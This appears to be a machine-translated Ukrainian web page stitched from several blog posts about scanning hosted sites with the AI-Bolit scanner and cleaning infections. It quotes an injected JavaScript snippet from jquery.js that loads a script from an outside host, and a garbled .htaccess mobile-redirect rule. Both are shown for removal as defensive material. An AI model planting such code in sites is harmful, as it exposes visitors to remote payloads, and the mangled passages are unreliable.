Веб сканер віруси shell php. AI-Bolit – ефективний сканер вірусів та іншого шкідливого коду на хостингу. Як працює сканер AI-Bolit

AI-Bolit - ефективний сканер вірусів та іншого шкідливого кодуна хостингу

Нас часто запитують - у чому унікальність сканера AI-Bolit? Чим він відрізняється від інших аналогічних інструментів пошуку шкідливого коду, таких як maldet, clamav чи навіть десктопних антивірусів? Коротка відповідь – вона краще детектує шкідливий код, написаний на PHP та Perl. Чому? Відповідь нижче.

З кожним днем ​​шкідливий код (хакерські веб-шелли, бекдори тощо) стають більш витонченими та складними. Крім обфускацій ідентифікаторів та шифрування коду

Повсюдно почали використовуватися неявні виклики функцій за допомогою методів з callable аргументами, handler"ів та непрямих викликів функцій.

Все менше залишається шкідливих скриптів з лінійною структурою та фіксованими ідентифікаторами. Код намагаються замаскувати і зробити якомога мінливішим, “поліморфним”

або навпаки, зробити максимально простим та схожим на звичайний скрипт.

Іноді, аналізуючи шкідливий скрипт, неможливо виділити фіксований фрагмент, яким однозначно можна було б ідентифікувати “шкідливість”. Очевидно, що подібний шкідливий код неможливо знайти за простою базою сигнатур (антивірусної бази), яка використовується в переважній більшості веб-антивірусів та сканерів на хостингу. Для ефективного пошукусучасних "шкідливих" необхідно використовувати більш складні методики визначення вірусних патернів, а в деяких випадках - евристику. Саме такий підхід ми застосовуємо у сканері шкідливого коду AI-BOLIT.
Використання великої бази гнучких патернів, що постійно вдосконалюються, на основі регулярних виразів, застосування додаткового евристичного аналізу, виробленого на основі сканування великої кількості заражених сайтів, дозволило зробити сканер AI-Bolit найефективнішим і найактивнішим інструментом адміністратора і веб-розробника.

Широку популярність AI-Bolit отримав також завдяки простому інтерфейсу та можливості вільного використання з некомерційною метою. Будь-який вебмайстер може абсолютно безкоштовно завантажити AI-Bolit з офіційного сайту http://revisium.com/ai/ та перевірити свій ресурс на наявність хакерських шеллів, бекдорів, дорвіїв, вірусів, спам-розсилників, прихованих посилань та інших шкідливих фрагментів та вставок. Сканер також активно використовується і комерційними компаніями - веб-студіями, хостинг-компаніями та інтернет-агентствами для перевірки та лікування клієнтських сайтів. Хостери інтегрують AI-Bolit у панель управління, веб-розробники використовують його для пошуку шкідливого коду та у власних сервісах моніторингу сайтів.

Нижче наведемо лише невеликий список можливостей сканера Ai-Bolit:

• запуск з консолі та браузера
• три режими сканування ("простий", "експерт", "параноїдальний") та два режими роботи ("експрес" та "повне сканування")
• пошук хакерських php та perl скриптів (шеллів, бекдорів), вірусних вставок, дорвіїв, спам-розсилників, скриптів з продажу посилань, скриптів клоакінгу та інших типів шкідливих скриптів. Пошук за шаблонами та регулярними виразами, а також використання евристик для визначення потенційно-шкідливого коду
• пошук сигнатур у зашифрованих, фрагментованих текстових блокахта закодованих hex/oct/dec послідовностях
• пошук підозрілих файлівз конструкціями, що застосовуються у шкідливих скриптах.
• пошук прихованих посилань у файлах
• пошук символічних посилань
• пошук коду пошукових та мобільних редиректів та багато іншого.

Офіційна сторінка скрипту

Напевно кожен, хто створює сайти, стикається з вірусняками і троянами на сайті. Перша проблема вчасно помітити проблему, до моменту, коли проекти схоплять песимізацію від пошукових систем або посипляться тягарі хостеру (за ддос, спам).

Ця стаття пишеться гарячими слідами, коли під час звичайного бекапу на машину під віндою вихідників сайту ESET Smart Security раптом почав лаятись на картинки, які вважав вірусняком. Виявилося, що за допомогою картинок на сайт був залитий бекдор FilesMan.

Діра була в тому, що скрипт дозволяв завантажувати користувачам картинки на сайт перевіряв, що завантажується картинка тільки по розширенню файлу. Вміст не перевірявся зовсім. Так робити не треба;) У результаті на сайт можна було завантажити будь-який php файлпід виглядом картинки. Але не про дірки…

Мова про те, що постало завдання щоденної перевірки всіх файлів сайту на вірусняки та трояни.

Перевірка сайту на віруси онлайн

Онлайн всякі перевірки сайту на віруси не підходять для цього від слова зовсім. Онлайн сканери поводяться як робот пошуковика, послідовно проходячи все доступні сторінкисайту. Перехід на сторінку сайту відбувається за посиланнями з інших сторінок сайту. Соотв. якщо зловмисник залив вам бекдор на сайт за допомогою картинки та посилання на цю картинку ніде на сторінках сайту немає та дефейсити сайт не став, також як вішати вірусняк на сторінки, то онлайн перевіркасайту на віруси просто цієї картинки не знайде і вірусу не знайде.

Навіщо ви запитаєте, зловмиснику так робити? Навіщо заливати бекдор та нічого не робити? Відповім – для спаму, для ддосу. Для іншої шкідливої ​​активності, яка ніяк не позначається на сторінках сайту.

Одним словом онлайн перевірка сайту на віруси абсолютно марна для повного спокою.

Плагін для перевірки WordPress сайту на віруси та трояни

Для вордпрес є відмінний антивірусний плагін. Називається він. У моєму випадку він чудово знаходив картинки з FilesMan чистив сайт від вірусів. Але він має важливий недолік. Під час перевірки він дає дике навантаження на сервер, тому що просто перебирає всі файли. Крім того, перевірка з коробки робиться тільки в ручну. Автоматизувати перевірку сайту з плагіном неможливо.

Ну і підхопити вірусняк можна і повз вордпрес, потрібно щось універсальне.

Перевірка вмісту сайту звичайним антивірусом

Як і було сказано вище проблеми і були виявлені випадково звичайним десктопним антивірусом під час бекапу. Звичайно, можна щодня скачувати весь сайт і перевіряти звичайним антивірусом. Все це цілком працездатне.

• по-перше, хочеться автоматизації. Щоб перевірка була в автоматичному режиміта за підсумками був готовий звіт.
• по-друге, є такі сайти, що викачувати їх кожен діти просто не реально,

Пробуємо AI-Bolit

Щось із вступом я затяг. У результаті всіх пошуків знайшовся чудовий БЕЗКОШТОВНИЙ антивірусдля сайту . Цей антивірус маємо на увазі різні схеми його використання. Я його використав через ssh.

Чи можна його використовувати на шаред хостингу - не розбирався, але думаю це можливо. AI-Bolit написаний на php і має можливість запуску з браузера. Тому чисто технічно – напевно, можна і на шареді.

Важливо! Айболіт не лікує сайт від вірусів - він їх ТІЛЬКИ ЗНАХОДИТЬ і дає звіт, які файли він вважає небезпечними. А що з ними робити ви вирішуєте самі. Тому просто тупо натиснути на кнопку та вилікувати сайт від троянів не вдасться.

Як користуватися AI-Bolit на VDS з ssh

У айболита є з інструкціями та майстер-класами щодо використання цього антивірусу. У загальному випадку послідовність проста:

• качаємо
• розпаковуємо на сервер (я розпаковував у /root/ai)
• далі з консолі ssh запускаємо php /root/ai/ai-bolit/ai-bolit.php
• перевірка може зайняти годинник, залежно від обсягу сайту
• за підсумками перевірки буде сформовано файл звіту AI-BOLIT-REPORT-<дата>-<время>.html

У файлі звіту буде видно проблемні файли, якщо такі знайдуться.

Велике навантаження на сервер

Головна проблема з якою стикаєшся з автоматичною перевіркою сайту на віруси – це навантаження на сервер. Усі антивіруси діють однаково, послідовно перебираючи усі доступні файли. І айболіт тут начебто не виняток. Він просто бере всі файли та послідовно їх перевіряє. Навантаження підскакує і це може тривати довго, що не прийнятно у продакшені.

Але у айболита є чумова можливість (за умови, що у вас повноцінний сервер або вдс з рут доступом). Спочатку для айболита можна сформувати перелік файлів для перевірки, а потім згодувати цей перелік. Тоді айболіт просто пробіжиться цим списком.

Для формування списку можна скористатися будь-якими способами сервера. У мене вийшов ось такий баш скрипт:

# bash /root/ai/run.sh # https://revisium.com/kb/ai-bolit-console-faq.html DOMAIN="сайт" AI_PATH="/root/ai" NOW=$(date +" %F-%k-%M-%S") # можна зробити публічну папку під парольним доступом REPORT_PATH="$AI_PATH/reports/$DOMAIN-$NOW.html" SCAN_PATH="/home/azzrael/web/$DOMAIN/ public_html/" SCAN_DAYS=90 #php /home/admin/ai/ai-bolit/ai-bolit.php --mode=1 --path=$SCAN_PATH --report=$REPORT_PATH # Скан тільки файлів змінених за Х днів # AI-BOLIT-DOUBLECHECK.php захардкодено автром айболита на --with-2check !!! find $SCAN_PATH -type f -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #find $SCAN_PATH -type f -name "*.ph*" -ctime -$SCAN_DAYS > " $AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #find $SCAN_PATH -type f -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #find $SCAN_PATH -type f -name "*.ph*" -o -name "*.gif" -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" php "$AI_PATH/ai-bolit/ai -bolit.php" --mode=1 --report=$REPORT_PATH --with-2check #history -c

Тут видно, що через команду find ми збираємо всі файли, створені за останні SCAN_DAYS, зберігаємо їх у список AI-BOLIT-DOUBLECHECK.php (до співж. перейменувати файл списку, на момент використання, було не можна), потім згодовуємо цей список айболіту. SCAN_DAYS може дорівнювати одному дню. Якщо поставити bash /root/ai/run.sh у щоденний крон, список файлів на перевірку може бути не дуже великим. Соотв. перевірка займе небагато часу і не буде сильно навантажувати сервер.

Ви впевнені, що ваші сайти не заражені вірусами? Ви перевірили сайт в онлайн антивірусі? Забудьте, онлайн антивіруси не зможуть ніколи знайти віруси, вшиті до вашого сайту вмілими хакерами.

Максимум, що вони зможуть, це визначити шкідливі скрипти, які ви самі по необачності встановили на своєму сайті. Тому потрібні радикальніші методи перевірки сайту на віруси, які зможуть не просто проскакати вершками, а заглянути всередину вашого проекту.

Як перевірити сайт на віруси платно та безкоштовно?

У цій статті буде розказано про декілька способів перевірити свій сайт на віруси:

Онлайн антивіруси – найпростіший, але при цьому і найненадійніший спосіб.

Антивірус Айболіт - найнадійніший, але й найскладніший спосіб.

Сайт антивірус Вірусдай - Найоптимальніший варіант.

Але спочатку трохи про те, чим небезпечний вірус на сайті.

Чим небезпечний злам сайту?

Але спочатку трохи теорії та особистого досвіду- ламали мене не раз. Навіщо сайт заражають вірусом? Отримавши доступ до вашого сайту зловмисники можуть виконати таке:

Почнуть зливати ваш трафік на свої проекти.
Завантажують вміст сервера та бази даних для продажу третім особам.
Підмінять контактні чи платіжні дані на сайті, завантажать персональні дані користувачів.
Розмістять на вашому сайті дорвеї зі спам-посиланнями.
Впровадять на сторінки сайту віруси, трояни чи експлойти, заражаючи відвідувачів.
Проведуть із вашого сервера спам-розсилку.
Продадуть доступ до зламаного сайту іншим зловмисникам для подальшого несанкціонованого проникнення.

Важливо розуміти: сайти з вірусами можуть потрапити під санкціїпошукових систем та втратити позиції. Мій хостинг вже не раз бомбили хакери, обрушуючи на нього. Навіщо це робиться? Ціль банальна: отримати доступ до ваших паролів або залити вірус на ваш сайт через вразливість у коді.

І це їм вдається, тому що вже двічі я видаляв залиті ними дорвеї зі своїх сайтів. Але це пів біди, тому що мої сайти були інфіковані після цього, і навіть зміна паролів мало дає при цьому. І гарантій, що все не повториться просто немає.

Потім, коли я знову вводжу адресу, я заходжу на сайт і адмінку в тому числі. Що за біда, досі не знаю. На цьому сайті, моєму останньому, такого немає. Так і під DDOS атакивін ще не влучав….

Найпростіший спосіб вилікувати сайт – це знести все та встановити скрипт сайту заново. Але, як розумієте, це крайній захід, до якого потрібно вдаватися лише у крайньому випадку. Та й до того ж шкідливий код можуть вшити у шаблон, а його не заміниш. Тому спочатку потрібно спробувати визначити, заражений наш сайт чи ні? Як це зробити?

Де перевірити сайт на віруси онлайн?

Перевірка сайту на віруси онлайн - хоча цей метод не найефективніший, як я написав вище, можна почати з нього. Є непоганий сервіс Antivirus Alarm .

Просто вводимо адресу сайту та чекаємо, поки сервіс перевірить ваш сайт на віруси. Якщо він знайде щось підозріле, то це видасть у звіті. Але якщо навіть цей онлайн антивірус нічого не знайде, спробуйте більш розвинене рішення.

Як перевірити на віруси сайт скриптом?

Буквально тиждень тому я перевірив усі свої сайти антивірусом Айболіт та виявив, що мій основний сайт інфікований.

Що це за антивірус і як із ним працювати?

Цей антивірус можна завантажити з сайту розробників. Айболіт . На даний момент є версія для Windows, раніше можна було працювати лише через хостинг.

Що може цей антивірус для сайту? Ось що:

— шукати віруси, шкідливі та хакерські скрипти на хостингу: шелли за сигнатурами та гнучкими патернами, шелли на основі нескладної евристики — все те, що звичайні — антивіруси та сканери знайти не можуть.
— шукати вразливі скрипти timthumb, fckeditor, uploadify, та інших.
- Шукати редиректи в.htaccess на шкідливі сайти.
- Шукати код посилальних бірж, таких як sape/trustlink/linkfeed/… в.php файлах
— визначати каталоги та файли дорвіїв.
- Шукати порожні посилання (невидимі посилання) у шаблонах.
- Показувати директорії, відкриті на запис.
- Працювати з усіма cms без винятку (joomla, wordpress, drupal, dle, bitrix, phpbb, ...)
— надсилати звіт по email або зберігати у файл.

Установка проста: розпаковуємо архів і заливаємо в папку з нашим сайтом файли ai-bolit.php, .aignore, .aurlignore з папки ai-bolit та файл з папки known_files, який відповідає версії нашої CMS, в моєму випадку це.aknown.wp_3_8 Wordpress. Можливо, потрібно буде встановити правильні права на файли, 755, наприклад.

Ну а тим, у кого правильний хостинг, потрібно увійти до терміналу (У мене лінукс, тому ніяких емуляторів не потрібно) і далі підключаємось до нашого хостингу через SSH.

Ssh ЛОГІН@АДРЕСА_СЕРВЕРА

Як це робити точно, не буду пояснювати, якщо ви не в темі, то тут потрібен індивідуальний підхід, пишіть у коментарях, поясню.

Після підключення потрібно перейти за допомогою cd команди в папку з сайтом. Далі даємо команду:

Php ai-bolit.php

Після цього розпочнеться сканування, яке триватиме досить довго, залежно від розміру сайту. Після закінчення у папці з сайтом з'явиться файл із зразковою назвою AI-BOLIT-REPORT-07-04-2014_23-10-719945.html

Відкриваємо файл і аналізуємо, що та як. У мене видало, наприклад, на самому початку:

Знайдено сигнатури шелл-скрипту. Підозра на шкідливий скрипт: (12)

Але насправді виявилося, що вірус лише один, а решта спрацьовування була на сертифікати, які схожі на шифровані записи.

Найпростіший спосіб розібратися тут – це завантажити чистий вордпрес, або що у вас там, і порівнювати підозрілі фали. Якщо в оригіналі все те саме, то хвилюватися не потрібно. А якщо ні, то видаляємо шкідливий код. Далі у мене лаялося на:

Подвійне розширення, зашифрований контент чи підозра на шкідливий скрипт. Потрібний додатковий аналіз: (14)

Лаявся антивірус на один плагін - ТОП 10 - не впевнений, що є проблема. Також інші небезпеки були хибним спрацьовуванням.

Також евристичний аналіз залаявся на файли wordpress, але я звірив з оригіналами і все було нормально.

У цих файлах розміщено невидимі посилання. Підозра на посилальний спам:

Тут я плагін, що створює кнопку ВВЕРХ - в ньому було приховане посилання.

Хоча щодо плагінів тут треба розуміти, що в них майже всі мають посилання. Але вирішується це просто, закриттям папки з плагінами від індексації. У Wordpress це можна зробити, вписавши в robot.txt рядок Disallow: /wp-content/plugins

У кожному випадку все буде дуже індивідуальним, тому важко написати щось конкретне. Мета статті більше у тому, щоб дати направлення.

Все б добре, та не вистачає одного — постійного моніторингу. Щодня запускати цей антивірус не будеш, а хакери працюють без вихідних. І тут нам допоможе інший чудовий сервіс. Як перевірити сайт сайт сервісом?

Автоматична перевірка сайту на віруси

Нещодавно з'явився сервіс Вірусдай , який може постійно здійснювати моніторинг сайту на відсутність вірусів. Виглядає все дуже приємно та функціонально, лікування сайтів від вірусів тут найзручніше:

Потрібно додати до них свій сайт і завантажити php-файл синхронізації, який заливається в корінь сайту. Далі можна запустити синхронізацію та сервіс перевірить ваш сайт на віруси.

У безкоштовної версіїможливості обмежені, тому якщо вам дорогий ваш сайт, то можна трохи заплатити і спати спокійно - сервіс сам шукатиме віруси і тут же їх лікувати.

Ну ось, на одному сайті виявлено вірус. Цей сайт якраз виносив вантаж мені сервер, поки я не вирубав протокол видаленої публікації. Проблема зникла, але вірус залишився:

Ну що ж, спробуємо видалити інфекцію. Ні, не тут було, сервіс безкоштовно видаляти вірус не хоче, видав лише таку інформацію:

Знайдені погрози: h.ExternalRedirect
У файлі конфігурації WEB-сервера містяться інструкції, що умовно або безумовно перенаправляють користувачів сайту на сторонні ресурси. Рекомендується видалення.

Як видалити вірус, який я знайшов на сайті? Спробую знайти вручну, а може, і підключуся на платний тариф, оскільки безпека сайтів дуже важлива. Хоча, швидше за все, цю заразу я приніс із шаред хостингу, тепер у мене відмінний VPS та проблем особливих не було. Отже, реєструємось на Вірусдай та підключаємо свій сайт.

Ось як перевірити свій сайт на віруси, якщо ви знаєте ще способи, і навіть краще за ці, то всім було б цікаво про них дізнатися.

Вчора в мене сталася не дуже приємна подія – заразили всі мої сайти. Добре, що я був за комп'ютером і одразу помітив проблему. Що сталося?

Один мій сайт стало раптом перекидати на якийсь сайт знайомств, непристойний сайт, м'яко кажучи. При переході на мій домен йшов редирект на цей спамерський сайт.

Це дуже погана ситуація, тому що якщо відразу не вирішити проблему, то ви можете налякати відвідувачів. А якщо це триватиме довго, то пошукові системиможуть накласти на ваш сайт фільтр і ви втратите всі позиції у пошуку.

Я вже писав якось про те, але в даному випадкупотрібно було знайти вірус швидко. Я одразу почав шукати шкідливий код вручну.

Так як переадресація йшла з усіх сторінок, то я подумав, який скрипт мені впровадили в шапку (header.php) або підвал (footer.php). Але там стороннього коду не було.

Я відразу зв'язався зі службою підтримки хостингу:

— У мене сайт такий, став переадресовуватися на якийсь непристойний ресурс, допоможіть вирішити проблему.

Але не встигли вони мені відповісти, як я сам здогадався, куди ще треба подивитися. У файлі.htaccess, який знаходиться в корені сайту, я виявив такий код:

RewriteEngine On RewriteBase / RewriteCond %(HTTP_USER_AGENT)










mobile|midp|mmp|netfront|palm(os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0| wadofone|wap|windows (ce|phone)|xda|xiino RewriteCond%(HTTP_USER_AGENT) )|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)| |-m | r | s) | avan | be (ck | )|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)| |d(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)| |fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)| t)|hei-|hi(pt|ta)|hp(i|ip)|hs-c| aw|tc)|i-(20|go|ma)|i230|iac(|-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro |jemu|jigs|kddi|keji|kgt (|/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg(g|/(k|l|u)| m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef |mo(01|02|bi|de|do|t(-| mt(50|p1|v)|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1) | 10) | ne ((c | m) - | on | tf | wf | wg | wt) | a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt- g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma| mm | ms | ny | va) | sc (01 | h- | oo | p-) | sdk / | se (c (- | 0 | 1) | 47 | sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v) |sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-| t(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750| (40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-|)|webc|whit|wi( g | nc | nw) | wmlb | wonu | x700 | yas- | your | zeto | zte-) >> SECURE .HTACCESS

Як тільки я його видалив, все почало працювати як треба. На все у мене пішло 5 хв. Але якби на моєму місці був повний новачок, то в нього на це могла б піти купа часу, якби він взагалі зміг знайти проблему сам.

На свій жах я виявив, що подібним чином заразили всі мої сайти. Я відразу усунув проблему і написав на підтримку хостингу:

У мене всі сайти заразили, отже заразили і все на вашому хостингу, непогано було б попередити народ.

На що була відповідь:

"Заразили" тільки файли Ваших сайтів. Отже, у якомусь із Ваших сайтів є вразливості, яку використовували для зміни файлів на обліковому записі. Вам потрібно звернутися до веб-розробника для пошуку та усунення цих вразливостей.

Може й так не перевірити. Це вже не перший випадок, коли мої сайти намагаються заразити на цьому хостингу. Невже у всіх вебмайстрів такі проблеми? Чи це тільки на моєму хостингу?

Це мій не перший хостинг, і ніде у мене не було таких проблем. Дедалі більше схиляюся до того, щоб змінити хостинг, наприклад на ЦЕЙ.

Не встиг я вирішити цю проблему як техпідтримка написала мені, що інший мій сайт розсилає спам. Як виявилося, мені в папку з одним плагіном залили сторонній php файл, і через нього якось слали спам.

Я видалив цей файл, і проблема вирішилася. У мене вже чітко складається враження, що WordPress це той же Windows, і що з цим робити?

Найбільший функціонал доступний при запуску сканера AI-BOLIT у режимі командного рядка. Це можна робити як під Windows/Unix/Mac OS X, так і безпосередньо на хостингу, якщо у вас є доступ по SSH і хостинг не сильно обмежує ресурси процесора, що споживаються.

Звертаємо увагу, що для запуску сканера потрібна консольна версія PHP 7.1 та вище. Більше ранні версіїофіційно не підтримуються. Перевірте поточну версіюкомандою php -v

Довідка параметрів командного рядка сканера AI-BOLIT

Показати допомогу

php ai-bolit.php --help

php ai-bolit.php --skip=jpg,png,gif,jpeg,JPG,PNG,GIF,bmp,xml,zip,rar,css,avi,mov

Просканувати лише певні розширення

php ai-bolit.php --scan=php,php5,pht,phtml,pl,cgi,htaccess,suspected,tpl

Підготувати файл карантину для відправки фахівцям із безпеки. Буде створено архів AI-QUARANTINE-XXXX.zip із паролем.

php ai-bolit.php --quarantine

Запустити сканер у режимі "параноїдальний" (рекомендується для отримання максимально-деталізованого звіту)

php ai-bolit.php --mode=2

php ai-bolit.php --mode=1

Перевірити один файл "pms.db" на шкідливий код

php ai-bolit.php -jpms.db

Запустити сканер із розміром пам'яті 512Mb

php ai-bolit.php --memory=512M

Встановити максимальний розмір файлу, що перевіряється 900Kb

php ai-bolit.php --size=900K

Робити паузу 500ms між файлами під час сканування (для зниження навантаження)

php ai-bolit.php --delay=500

Надіслати звіт про сканування на email [email protected]

php ai-bolit.php [email protected]

Створити звіт у файлі /home/scanned/report_site1.html

php ai-bolit.php --report=/home/scanned/report_site1.html

Просканувати директорію /home/s/site1/public_html/ (звіт за промовчанням буде створений в ній, якщо не задана опція --report=файл_звіту)

php ai-bolit.php --path=/home/s/site1/public_html/

Виконати команду після завершення сканування.

php ai-bolit.php --cmd="~/postprocess.sh"

Отримати звіт у текстовому вигляді (plain-text) з ім'ям site1.txt

php ai-bolit.php -lsite1.txt

Можна комбінувати дзвінки, наприклад,

php ai-bolit.php --size=300K --path=/home/s/site1/public_html/ --mode=2 --scan=php,phtml,pht,php5,pl,cgi,suspected

Комбінуючи виклик сканера AI-BOLIT з іншими командами unix, можна виконувати, наприклад, пакетну перевірку сайтів. Нижче наведемо приклад перевірки кількох сайтів, розміщених усередині облікового запису. Наприклад, якщо сайти розміщені всередині директорії /var/www/user1/data/www, команда на запуск сканера буде

find /var/www/user1/data/www -maxdepth 1 -type d -exec php ai-bolit.php --path=() --mode=2 \;

Додавши параметр --report, можна керувати каталогом, у якому будуть створюватися звіти про сканування.

php ai-bolit.php список параметрів … --eng

Переключити інтерфейс звіту англійською. Цей параметрмає йти останнім.

Інтеграція з іншими сервісами та в панель хостингу

php ai-bolit.php --json_report=/path/file.json

Сформувати звіт у форматі json

php ai-bolit.php --progress=/path/progress.json

Зберігати статус перевірки файлу json. Цей файл міститиме структуровані дані у форматі json: поточний файл перевірки, скільки файлів перевірено, скільки файлів залишилося перевірити, відсоток перевірки, час до завершення сканування. Даний механізм можна використовувати, щоб в панелі показувати прогрес-бар і дані про файли, що перевіряються. Після завершення сканування файл видаляється автоматично.

php ai-bolit.php --handler=/path/hander.php

Зовнішній обробник подій. Ви можете додати власні обробники початку/завершення сканування/прогресу сканування/помилки сканування. Приклад файлу можна переглянути в архіві сканера, в каталозі tools/handler.php. Наприклад, після завершення сканування можна щось зробити з файлом звіту (надіслати поштою, запакувати в архів тощо).

Сьогодні до мене звернулися за допомогою в очищення інтернет-магазину від вірусів. Несподівано для одного зі співробітників прийшла відмова у рекламі Google Adwords. У листі зазначили, що у файлі jquery.jsпрописано підозрілий код

Насамперед я за допомогою браузера відкрив шлях до цього файлу, але антивірус Avast ніяк не зреагував на даний файлХоча візуально я вже бачив шкідливий код. Потім я з'єднався ftp за допомогою FileZilla і спробував відкрити файл за допомогою програми Notepad++ . І ось тут мій антивірус заблокував доступ до цього файлу.

Щоб почистити файл js від вірусу, мені довелося на 10 хвилин відключити AVAST, а потім видалити з файлу шкідливі рядки.

Якщо ви зіткнулися з подібною проблемою, видаліть наступний код як показано на малюнку, або ці рядки.

Var r=document.referrer; var c=document.cookie; r1=0; if ((r.indexOf("yandex")>0) || (r.indexOf("google")>0) || (r.indexOf("rambler")>0) || (r.indexOf(" mail")>0)) ( document.cookie = "__ga1=1; expires=Wed, 1 Mar 2020 00:00:00; path=/;"; r1=1; ) else (if (c.indexOf(" __ga1")==-1)(document.cookie = "__ga2=1; expires=Wed, 1 Mar 2020 00:00:00; path=/;";)) if (((c.indexOf("__ga1") )>-1) || (r1==1)) && (c.indexOf("__ga2")==-1)) (document.write(unescape("%3Cscript src="http://google-analyzing .com/urchin.js" type="text/javascript"%3E%3C/script%3E"));)

Бекап сайту.

Далі з'єднуємося по ssh доступу, наприклад, за допомогою утиліти putty і по можливості робимо архів сайту. Для цього достатньо в консолі скористатися наступною командою:

tar - cf backup .tar /home/логін/site/public_html

Бекап сайту можна і не робити, але чи мало ви видалите щось важливе?

Тепер є два варіанти перевірки сайту на віруси

1. Перевірка сайту з допомогою phpскрипта Ai-Bolit, який шукає різні віруси і php shell.

2. Завантажити весь сайт до себе на комп'ютер та прогнати антивірусом Avast, але перший варіант значно кращий, зручніший, і значно якісніший.

Очищення сайту на локальному комп'ютері

Спочатку я скористався другим способом, тож опишу саме його. Після того, як на комп'ютер були викачані всі файли (або архів), а їх трохи не мало 25 000, я відкрив Avast і вказав папку з файлами сайту для їх перевірки на шкідливі скрипти.

Після того, як Avast виконав перевірку в папці з файлами веб-сайту було виявлено два скриптові віруси:

• Php-Shell-Jv
• Js-Redirector-Fc

Файл index.php складався з наступного коду:

У файлі javascript "ui.datepicker_old.js" був шкідливий код у самому низу змісту скрипту. Цей код потрібно видалити!

Очищення сайту від вірусів за допомогою Ai-Bolit.

FTP спосіб.

1. Завантажуємо архів зі скриптом Айболіт на локальний комп'ютері розпаковуємо його.

2. З'єднуємося ftp за допомогою клієнта FileZilla

3. Розпаковані файли архіву розміщуємо до головної директорії сайту /home/ваш сайт/public_html

4. Запускаємо скрипт http://ваш домен/ai-bolit.php

5. Файл звіту буде створено у головній директорії з ім'ям AI-BOLIT-REPORT.html

Якщо після запуску скрипта відображається чистий білий екран, то версія php на сервері хостера не підходить для Айболита.

Увага!Якщо необхідно перевірити всі сайти в директорії, завантажуємо скрипт в папку /home/domains/ або /home/, тоді Ai-Bolit рекурсивно пройдеться по всіх папках, і видасть звіт, але як мені здається краще перевіряти по одному домену.

Консольний варіант (SSH)

1. Запускаємо програму Putty або іншу консольну програму.

2. З'єднуємося з сервером по хосту та паролю.

3. Переходимо до головної директорії сайту командою cd /home/ваш логін/ваш сайт/public_html/

4. Завантажуємо скрипт командою wget http://www..zip

5. Розпаковуємо zip архівкомандою unzip 20160904_112415ai-bolit.zip

6. Запускаємо скрипт php ai-bolit.php

Для запуску фоновому режимівикористовуємо команду: screen -d -m php ai-bolit.php

7. Чекаємо поки що скрипт виконає перевірку, і створить звіт виду " AI-BOLIT-REPORT.html" на сервері.

Також зверніть увагу, якщо на вашому сервері встановлено php нижче 5.3, Айболіт покаже помилку і не запустить сканування. У моєму випадку довелося викачувати сайт і перевіряти його на своєму сервері.

Після того як на сервері буде створено файл звіту, його можна завантажити до себе на комп'ютер і подивитися звичайним браузером (Хром, Файєрфокс, і т.д).

В першу чергу варто звернути увагу на звіт про "Шкідливі скрипти", ну а далі або акуратно видаляти ці файли, або чистити ручним способомяк це роблю я.